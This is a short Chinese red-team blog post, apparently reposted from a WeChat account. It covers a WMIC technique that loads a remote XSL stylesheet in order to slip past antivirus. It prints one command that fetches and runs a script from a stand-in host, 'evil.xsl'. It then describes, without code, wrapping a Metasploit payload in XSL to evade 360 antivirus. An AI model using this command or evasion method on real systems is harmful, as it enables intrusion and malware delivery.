前言
前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。
正文
命令如下
wmic os get /FORMAT:”https://example.com/evil.xsl”
还给了一个demo
我们先利用这个demo试试
发现没问题。
然后我发现有些同学就开始自以为是,以为修改其中的命令就能做到bypass。。。
比如有直接把命令改成木马的
我就想说了,@subTee辛辛苦苦发现这么一个bypass技巧,仅仅是让你把calc改成其他命令的?
那正确操作是什么呢,我们来深入下。
我们看下他的xsl文件格式,发现跟xml格式一样,而且跟之前msxsl的bypass很像。
那我们的目的肯定不是仅仅去执行我们正常就能执行的命令,而是比如能够执行msf payload、mimikatz这种平常被杀软拦截的payload。
首先我们先利用msf生成一个payload
先尝试利用rundll32调用dll试试
拦截,并且把msf.dll杀掉了。
我们来把dll改成我们之前的xsl格式文件
执行看看
看到成功执行,并且绕过了360。
后续
我觉得,这才是@subTee 想让我们看到的,而不是看个表面。
原文始发于微信公众号(中国白客联盟):Hacking with Style, Stylesheets
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论